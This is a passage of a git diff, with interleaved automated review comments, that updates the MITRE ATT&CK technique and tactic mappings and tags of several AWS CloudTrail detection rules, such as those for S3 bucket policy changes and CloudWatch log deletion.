-updated_date = "2026/01/16"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -85,15 +85,7 @@ references = [
 risk_score = 21
 rule_id = "7d091a76-0737-11ef-8469-f661ea17fbcc"
 severity = "low"
-tags = [
- "Domain: Cloud",
- "Data Source: AWS",
- "Data Source: Amazon Web Services",
- "Data Source: AWS Lambda",
- "Use Case: Threat Detection",
- "Tactic: Execution",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS Lambda", "Use Case: Threat Detection", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -107,17 +99,34 @@ event.dataset: aws.cloudtrail
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1578"
+name = "Modify Cloud Compute Infrastructure"
+reference = "https://attack.mitre.org/techniques/T1578/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1578.005"
+name = "Modify Cloud Compute Configurations"
+reference = "https://attack.mitre.org/techniques/T1578/005/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1648"
 name = "Serverless Execution"
 reference = "https://attack.mitre.org/techniques/T1648/"
-
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/execution_new_terms_cloudformation_createstack.toml b/rules/integrations/aws/execution_new_terms_cloudformation_createstack.toml
index 7164fa9a520..17dfd9e37dd 100644
--- a/rules/integrations/aws/execution_new_terms_cloudformation_createstack.toml
+++ b/rules/integrations/aws/execution_new_terms_cloudformation_createstack.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/07/25"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/16"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -98,14 +98,14 @@ field_names = [
 framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1648"
-name = "Serverless Execution"
-reference = "https://attack.mitre.org/techniques/T1648/"
+id = "T1651"
+name = "Cloud Administration Command"
+reference = "https://attack.mitre.org/techniques/T1651/"
+
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
-
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["cloud.account.id", "user.name"]
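Review bot: Adding `T1578.005` "Modify Cloud Compute Configurations" under Defense Evasion for a Lambda layer attachment is a stretch: T1578 is written around the lifecycle and settings of compute instances (VMs, snapshots, instance attributes), while swapping a function's layer changes the code the function runs, which the existing T1648 entry already captures. The Defense Evasion angle only holds if the rule argues that the layer hides or replaces runtime dependencies, and nothing in this hunk establishes that. Either document that rationale in the rule's description (outside this hunk) or drop the new entry and the matching `"Tactic: Defense Evasion"` tag added in the previous hunk.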
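Review bot: Replacing T1648 with `T1651` "Cloud Administration Command" for CloudFormation `CreateStack` changes what the rule claims: T1651 describes abusing cloud-management services (SSM Run Command and the like) to run commands inside existing VMs, whereas CreateStack provisions resources from a template and may never execute anything on a host. If the concern is a stack that stands up Lambda functions or EC2 instances with user-data, T1648 or `T1578.002` "Create Cloud Instance" describes that more accurately; confirm the intent before the old mapping is lost.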
diff --git a/rules/integrations/aws/exfiltration_dynamodb_scan_by_unusual_user.toml b/rules/integrations/aws/exfiltration_dynamodb_scan_by_unusual_user.toml
index d54fc7697a2..4746bdbd03c 100644
--- a/rules/integrations/aws/exfiltration_dynamodb_scan_by_unusual_user.toml
+++ b/rules/integrations/aws/exfiltration_dynamodb_scan_by_unusual_user.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/03/13"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2025/09/08"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -60,15 +60,7 @@ risk_score = 21
 rule_id = "96b2a03e-003b-11f0-8541-f661ea17fbcd"
 setup = "DynamoDB data events must be enabled in CloudTrail to capture the Scan action. Ensure that the AWS CloudTrail service is configured to log data events for DynamoDB tables."
 severity = "low"
-tags = [
- "Domain: Cloud",
- "Data Source: AWS",
- "Data Source: Amazon Web Services",
- "Data Source: AWS DynamoDB",
- "Resources: Investigation Guide",
- "Use Case: Threat Detection",
- "Tactic: Exfiltration",
-]
+tags = ["Domain: Cloud", "Tactic: Collection", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS DynamoDB", "Resources: Investigation Guide", "Use Case: Threat Detection"]
 timestamp_override = "event.ingested"
 type = "new_terms"
@@ -82,29 +74,16 @@ event.dataset: "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1567"
-name = "Exfiltration Over Web Service"
-reference = "https://attack.mitre.org/techniques/T1567/"
-
-[rule.threat.tactic]
-id = "TA0010"
-name = "Exfiltration"
-reference = "https://attack.mitre.org/tactics/TA0010/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1530"
 name = "Data from Cloud Storage"
 reference = "https://attack.mitre.org/techniques/T1530/"
-
 [rule.threat.tactic]
 id = "TA0009"
 name = "Collection"
 reference = "https://attack.mitre.org/tactics/TA0009/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/exfiltration_ec2_export_task.toml b/rules/integrations/aws/exfiltration_ec2_export_task.toml
index 0934b06a3a4..d6187d0130b 100644
--- a/rules/integrations/aws/exfiltration_ec2_export_task.toml
+++ b/rules/integrations/aws/exfiltration_ec2_export_task.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/10/23"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/16"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -77,16 +77,7 @@ references = [
 risk_score = 47
 rule_id = "deee5856-25ba-438d-ae53-09d66f41b127"
 severity = "medium"
-tags = [
- "Domain: Cloud",
- "Data Source: AWS",
- "Data Source: Amazon Web Services",
- "Data Source: AWS EC2",
- "Use Case: Asset Visibility",
- "Tactic: Exfiltration",
- "Tactic: Collection",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Tactic: Exfiltration", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EC2", "Use Case: Asset Visibility", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -100,39 +91,21 @@ event.dataset: "aws.cloudtrail" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
-id = "T1537"
-name = "Transfer Data to Cloud Account"
-reference = "https://attack.mitre.org/techniques/T1537/"
+id = "T1567"
+name = "Exfiltration Over Web Service"
+reference = "https://attack.mitre.org/techniques/T1567/"
+[[rule.threat.technique.subtechnique]]
+id = "T1567.002"
+name = "Exfiltration to Cloud Storage"
+reference = "https://attack.mitre.org/techniques/T1567/002/"
 [rule.threat.tactic]
 id = "TA0010"
 name = "Exfiltration"
 reference = "https://attack.mitre.org/tactics/TA0010/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1005"
-name = "Data from Local System"
-reference = "https://attack.mitre.org/techniques/T1005/"
-
-[[rule.threat.technique]]
-id = "T1119"
-name = "Automated Collection"
-reference = "https://attack.mitre.org/techniques/T1119/"
-
-[[rule.threat.technique]]
-id = "T1530"
-name = "Data from Cloud Storage"
-reference = "https://attack.mitre.org/techniques/T1530/"
-
-
-[rule.threat.tactic]
-id = "TA0009"
-name = "Collection"
-reference = "https://attack.mitre.org/tactics/TA0009/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/exfiltration_ec2_full_network_packet_capture_detected.toml b/rules/integrations/aws/exfiltration_ec2_full_network_packet_capture_detected.toml
index a0aa65612d3..c0fa1715988 100644
--- a/rules/integrations/aws/exfiltration_ec2_full_network_packet_capture_detected.toml
+++ b/rules/integrations/aws/exfiltration_ec2_full_network_packet_capture_detected.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/05/05"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/21"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic", "Austin Songer"]
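Review bot: Swapping `T1537` "Transfer Data to Cloud Account" for `T1567.002` "Exfiltration to Cloud Storage" narrows this rule in the wrong direction: an EC2 export task writes the image to an S3 bucket inside AWS, and ATT&CK frames T1567.002 around third-party web storage services reached over HTTP, while T1537 is the technique for moving data to another account through the provider's own APIs. If the destination bucket can sit in an attacker-controlled account, T1537 is the closer mapping and is worth keeping alongside `T1567.002` rather than replacing it. Removing the three-technique Collection entry is fine; T1005/T1119/T1530 were all over-mapped for a single export API call.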
@@ -99,16 +99,7 @@ references = [
 risk_score = 47
 rule_id = "c1812764-0788-470f-8e74-eb4a14d47573"
 severity = "medium"
-tags = [
- "Domain: Cloud",
- "Data Source: AWS",
- "Data Source: Amazon Web Services",
- "Data Source: AWS EC2",
- "Use Case: Network Security Monitoring",
- "Tactic: Exfiltration",
- "Tactic: Collection",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Tactic: Discovery", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EC2", "Use Case: Network Security Monitoring", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -122,46 +113,16 @@ event.dataset: "aws.cloudtrail" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1020"
-name = "Automated Exfiltration"
-reference = "https://attack.mitre.org/techniques/T1020/"
-
-[[rule.threat.technique]]
-id = "T1537"
-name = "Transfer Data to Cloud Account"
-reference = "https://attack.mitre.org/techniques/T1537/"
-
-
-[rule.threat.tactic]
-id = "TA0010"
-name = "Exfiltration"
-reference = "https://attack.mitre.org/tactics/TA0010/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1074"
-name = "Data Staged"
-reference = "https://attack.mitre.org/techniques/T1074/"
-
-[rule.threat.tactic]
-id = "TA0009"
-name = "Collection"
-reference = "https://attack.mitre.org/tactics/TA0009/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1040"
 name = "Network Sniffing"
 reference = "https://attack.mitre.org/techniques/T1040/"
-
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/exfiltration_rds_snapshot_export.toml b/rules/integrations/aws/exfiltration_rds_snapshot_export.toml
index a0ba6578562..42239c6cd28 100644
--- a/rules/integrations/aws/exfiltration_rds_snapshot_export.toml
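Review bot: The file keeps its `exfiltration_` name prefix while the only tactic left in the `@@ -122,46 +113,16 @@` hunk is Discovery (TA0007) and the tag in the first hunk becomes `Tactic: Discovery`; if the repository's convention of prefixing rule file names with the primary tactic is enforced, this needs a rename in this or a later patch of the series. The same prefix/tactic drift appears in `exfiltration_s3_bucket_policy_added_for_external_account_access.toml` (now Persistence), `exfiltration_s3_bucket_policy_added_for_public_access.toml` (now Defense Evasion), the `impact_*` rules remapped to Defense Evasion or Discovery (eventbridge, s3 bucket enumeration, cloudtrail logging, cloudwatch log group/stream deletion, ec2 disable ebs encryption, iam deactivate mfa device, rds deletion protection) and `lateral_movement_ec2_instance_connect_ssh_public_key_uploaded.toml` (now Persistence). Dropping the `Tactic: Exfiltration` and `Tactic: Collection` tags also leaves the rule's name, description and investigation guide, which sit outside these hunks, worth checking for stale exfiltration wording.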
+++ b/rules/integrations/aws/exfiltration_rds_snapshot_export.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/06/06"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/16"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic", "Austin Songer"]
@@ -151,28 +151,38 @@ event.dataset: aws.cloudtrail
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[rule.threat.tactic]
-id = "TA0010"
-name = "Exfiltration"
-reference = "https://attack.mitre.org/tactics/TA0010/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1213"
 name = "Data from Information Repositories"
 reference = "https://attack.mitre.org/techniques/T1213/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1213.006"
 name = "Databases"
 reference = "https://attack.mitre.org/techniques/T1213/006/"
-
-
 [rule.threat.tactic]
 id = "TA0009"
 name = "Collection"
 reference = "https://attack.mitre.org/tactics/TA0009/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1567"
+name = "Exfiltration Over Web Service"
+reference = "https://attack.mitre.org/techniques/T1567/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1567.002"
+name = "Exfiltration to Cloud Storage"
+reference = "https://attack.mitre.org/techniques/T1567/002/"
+
+[rule.threat.tactic]
+id = "TA0010"
+name = "Exfiltration"
+reference = "https://attack.mitre.org/tactics/TA0010/"
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_external_account_access.toml b/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_external_account_access.toml
index 999b1b4a28f..508c391abc5 100644
--- a/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_external_account_access.toml
+++ b/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_external_account_access.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/04/17"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/16"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -116,16 +116,7 @@ references = [
 risk_score = 47
 rule_id = "e8c9ff14-fd1e-11ee-a0df-f661ea17fbce"
 severity = "medium"
-tags = [
- "Domain: Cloud",
- "Data Source: AWS",
- "Data Source: Amazon Web Services",
- "Data Source: AWS S3",
- "Use Case: Threat Detection",
- "Tactic: Exfiltration",
- "Tactic: Collection",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Tactic: Persistence", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS S3", "Use Case: Threat Detection", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -148,29 +139,16 @@ and not stringContains(aws.cloudtrail.request_parameters, aws.cloudtrail.recipie
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1537"
-name = "Transfer Data to Cloud Account"
-reference = "https://attack.mitre.org/techniques/T1537/"
-
-[rule.threat.tactic]
-id = "TA0010"
-name = "Exfiltration"
-reference = "https://attack.mitre.org/tactics/TA0010/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1530"
-name = "Data from Cloud Storage"
-reference = "https://attack.mitre.org/techniques/T1530/"
-
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
 [rule.threat.tactic]
-id = "TA0009"
-name = "Collection"
-reference = "https://attack.mitre.org/tactics/TA0009/"
-
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_public_access.toml b/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_public_access.toml
index 6d7ba2052c1..326b18d51b8 100644
--- a/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_public_access.toml
+++ b/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_public_access.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/10/30"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/16"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -115,16 +115,7 @@ references = [
 risk_score = 47
 rule_id = "618bb351-00f0-467b-8956-8cace8b81f07"
 severity = "medium"
-tags = [
- "Domain: Cloud",
- "Data Source: AWS",
- "Data Source: Amazon Web Services",
- "Data Source: AWS S3",
- "Use Case: Threat Detection",
- "Tactic: Exfiltration",
- "Tactic: Collection",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS S3", "Use Case: Threat Detection", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -140,29 +131,16 @@ info where event.dataset == "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1537"
-name = "Transfer Data to Cloud Account"
-reference = "https://attack.mitre.org/techniques/T1537/"
-
-[rule.threat.tactic]
-id = "TA0010"
-name = "Exfiltration"
-reference = "https://attack.mitre.org/tactics/TA0010/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1530"
-name = "Data from Cloud Storage"
-reference = "https://attack.mitre.org/techniques/T1530/"
-
+id = "T1484"
+name = "Domain or Tenant Policy Modification"
+reference = "https://attack.mitre.org/techniques/T1484/"
 [rule.threat.tactic]
-id = "TA0009"
-name = "Collection"
-reference = "https://attack.mitre.org/tactics/TA0009/"
-
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/exfiltration_sns_rare_protocol_subscription_by_user.toml b/rules/integrations/aws/exfiltration_sns_rare_protocol_subscription_by_user.toml
index 465364b2801..f744c959733 100644
--- a/rules/integrations/aws/exfiltration_sns_rare_protocol_subscription_by_user.toml
+++ b/rules/integrations/aws/exfiltration_sns_rare_protocol_subscription_by_user.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/11/01"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/21"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -64,17 +64,7 @@ references = [
 risk_score = 21
 rule_id = "3df49ff6-985d-11ef-88a1-f661ea17fbcd"
 severity = "low"
-tags = [
- "Domain: Cloud",
- "Data Source: AWS",
- "Data Source: Amazon Web Services",
- "Data Source: AWS SNS",
- "Resources: Investigation Guide",
- "Use Case: Threat Detection",
- "Tactic: Exfiltration",
- "Tactic: Collection",
- "Tactic: Impact",
-]
+tags = ["Domain: Cloud", "Tactic: Exfiltration", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS SNS", "Resources: Investigation Guide", "Use Case: Threat Detection"]
 timestamp_override = "event.ingested"
 type = "new_terms"
@@ -88,46 +78,16 @@ event.dataset: "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1567"
 name = "Exfiltration Over Web Service"
 reference = "https://attack.mitre.org/techniques/T1567/"
-
 [rule.threat.tactic]
 id = "TA0010"
 name = "Exfiltration"
 reference = "https://attack.mitre.org/tactics/TA0010/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1530"
-name = "Data from Cloud Storage"
-reference = "https://attack.mitre.org/techniques/T1530/"
-
-
-[rule.threat.tactic]
-id = "TA0009"
-name = "Collection"
-reference = "https://attack.mitre.org/tactics/TA0009/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1496"
-name = "Resource Hijacking"
-reference = "https://attack.mitre.org/techniques/T1496/"
-[[rule.threat.technique.subtechnique]]
-id = "T1496.004"
-name = "Cloud Service Hijacking"
-reference = "https://attack.mitre.org/techniques/T1496/004/"
-
-
-
-[rule.threat.tactic]
-id = "TA0040"
-name = "Impact"
-reference = "https://attack.mitre.org/tactics/TA0040/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/impact_aws_eventbridge_rule_disabled_or_deleted.toml b/rules/integrations/aws/impact_aws_eventbridge_rule_disabled_or_deleted.toml
index 4b6fbec2338..1f89a48a949 100644
--- a/rules/integrations/aws/impact_aws_eventbridge_rule_disabled_or_deleted.toml
+++ b/rules/integrations/aws/impact_aws_eventbridge_rule_disabled_or_deleted.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/10/17"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/16"
+updated_date = "2026/03/23"
 [rule]
 author = ["Austin Songer", "Elastic"]
@@ -100,14 +100,7 @@ references = [
 risk_score = 21
 rule_id = "87594192-4539-4bc4-8543-23bc3d5bd2b4"
 severity = "low"
-tags = [
- "Domain: Cloud",
- "Data Source: AWS",
- "Data Source: Amazon Web Services",
- "Data Source: AWS EventBridge",
- "Tactic: Impact",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EventBridge", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -121,17 +114,16 @@ event.dataset: aws.cloudtrail
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1489"
-name = "Service Stop"
-reference = "https://attack.mitre.org/techniques/T1489/"
+[[rule.threat.technique]]
+id = "T1562"
+name = "Impair Defenses"
+reference = "https://attack.mitre.org/techniques/T1562/"
 [rule.threat.tactic]
-id = "TA0040"
-name = "Impact"
-reference = "https://attack.mitre.org/tactics/TA0040/"
-
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/impact_aws_s3_bucket_enumeration_or_brute_force.toml b/rules/integrations/aws/impact_aws_s3_bucket_enumeration_or_brute_force.toml
index 013d9381c79..6f372dd93a0 100644
--- a/rules/integrations/aws/impact_aws_s3_bucket_enumeration_or_brute_force.toml
+++ b/rules/integrations/aws/impact_aws_s3_bucket_enumeration_or_brute_force.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/05/01"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/16"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -80,17 +80,7 @@ references = [
 risk_score = 21
 rule_id = "5f0234fd-7f21-42af-8391-511d5fd11d5c"
 severity = "low"
-tags = [
- "Domain: Cloud",
- "Data Source: AWS",
- "Data Source: Amazon Web Services",
- "Data Source: AWS S3",
- "Resources: Investigation Guide",
- "Use Case: Log Auditing",
- "Tactic: Impact",
- "Tactic: Discovery",
- "Tactic: Collection",
-]
+tags = ["Domain: Cloud", "Tactic: Discovery", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS S3", "Resources: Investigation Guide", "Use Case: Log Auditing"]
 timestamp_override = "event.ingested"
 type = "threshold"
@@ -111,18 +101,7 @@ field_names = [
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1657"
-name = "Financial Theft"
-reference = "https://attack.mitre.org/techniques/T1657/"
-
-[rule.threat.tactic]
-id = "TA0040"
-name = "Impact"
-reference = "https://attack.mitre.org/tactics/TA0040/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1619"
 name = "Cloud Storage Object Discovery"
@@ -132,20 +111,6 @@ reference = "https://attack.mitre.org/techniques/T1619/"
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1530"
-name = "Data from Cloud Storage"
-reference = "https://attack.mitre.org/techniques/T1530/"
-
-
-[rule.threat.tactic]
-id = "TA0009"
-name = "Collection"
-reference = "https://attack.mitre.org/tactics/TA0009/"
-
-
 [rule.threshold]
 field = ["tls.client.server_name", "source.address", "aws.cloudtrail.user_identity.type"]
 value = 1
diff --git a/rules/integrations/aws/impact_cloudtrail_logging_updated.toml b/rules/integrations/aws/impact_cloudtrail_logging_updated.toml
index f19cadad27f..05d22d3c38f 100644
--- a/rules/integrations/aws/impact_cloudtrail_logging_updated.toml
+++ b/rules/integrations/aws/impact_cloudtrail_logging_updated.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/06/10"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/16"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -65,15 +65,7 @@ references = [
 risk_score = 21
 rule_id = "3e002465-876f-4f04-b016-84ef48ce7e5d"
 severity = "low"
-tags = [
- "Domain: Cloud",
- "Data Source: AWS",
- "Data Source: Amazon Web Services",
- "Data Source: AWS Cloudtrail",
- "Use Case: Log Auditing",
- "Resources: Investigation Guide",
- "Tactic: Impact",
-]
+tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS Cloudtrail", "Use Case: Log Auditing", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -87,34 +79,21 @@ event.dataset: "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1565"
-name = "Data Manipulation"
-reference = "https://attack.mitre.org/techniques/T1565/"
-[[rule.threat.technique.subtechnique]]
-id = "T1565.001"
-name = "Stored Data Manipulation"
-reference = "https://attack.mitre.org/techniques/T1565/001/"
-
-
-[rule.threat.tactic]
-id = "TA0040"
-name = "Impact"
-reference = "https://attack.mitre.org/tactics/TA0040/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1530"
-name = "Data from Cloud Storage"
-reference = "https://attack.mitre.org/techniques/T1530/"
+id = "T1562"
+name = "Impair Defenses"
+reference = "https://attack.mitre.org/techniques/T1562/"
+[[rule.threat.technique.subtechnique]]
+id = "T1562.008"
+name = "Disable or Modify Cloud Logs"
+reference = "https://attack.mitre.org/techniques/T1562/008/"
 [rule.threat.tactic]
-id = "TA0009"
-name = "Collection"
-reference = "https://attack.mitre.org/tactics/TA0009/"
-
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/impact_cloudwatch_log_group_deletion.toml b/rules/integrations/aws/impact_cloudwatch_log_group_deletion.toml
index 1f6a8dd5d98..461ca5fca01 100644
--- a/rules/integrations/aws/impact_cloudwatch_log_group_deletion.toml
+++ b/rules/integrations/aws/impact_cloudwatch_log_group_deletion.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/05/18"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/21"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -126,16 +126,7 @@ references = [
 risk_score = 47
 rule_id = "68a7a5a5-a2fc-4a76-ba9f-26849de881b4"
 severity = "medium"
-tags = [
- "Domain: Cloud",
- "Data Source: AWS",
- "Data Source: Amazon Web Services",
- "Data Source: Amazon CloudWatch",
- "Use Case: Log Auditing",
- "Resources: Investigation Guide",
- "Tactic: Defense Evasion",
- "Tactic: Impact",
-]
+tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: Amazon CloudWatch", "Use Case: Log Auditing", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -151,34 +142,21 @@ event.dataset: "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1485"
-name = "Data Destruction"
-reference = "https://attack.mitre.org/techniques/T1485/"
-
-[rule.threat.tactic]
-id = "TA0040"
-name = "Impact"
-reference = "https://attack.mitre.org/tactics/TA0040/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
-[[rule.threat.technique.subtechnique]]
-id = "T1562.001"
-name = "Disable or Modify Tools"
-reference = "https://attack.mitre.org/techniques/T1562/001/"
-
+[[rule.threat.technique.subtechnique]]
+id = "T1562.008"
+name = "Disable or Modify Cloud Logs"
+reference = "https://attack.mitre.org/techniques/T1562/008/"
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/impact_cloudwatch_log_stream_deletion.toml b/rules/integrations/aws/impact_cloudwatch_log_stream_deletion.toml
index 6312cf48c76..2579dfe7c4f 100644
--- a/rules/integrations/aws/impact_cloudwatch_log_stream_deletion.toml
+++ b/rules/integrations/aws/impact_cloudwatch_log_stream_deletion.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/05/20"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/21"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -113,16 +113,7 @@ references = [
 risk_score = 47
 rule_id = "d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17"
 severity = "medium"
-tags = [
- "Domain: Cloud",
- "Data Source: AWS",
- "Data Source: Amazon Web Services",
- "Data Source: Amazon CloudWatch",
- "Use Case: Log Auditing",
- "Tactic: Defense Evasion",
- "Tactic: Impact",
- "Resources: Investigation Guide",
-]
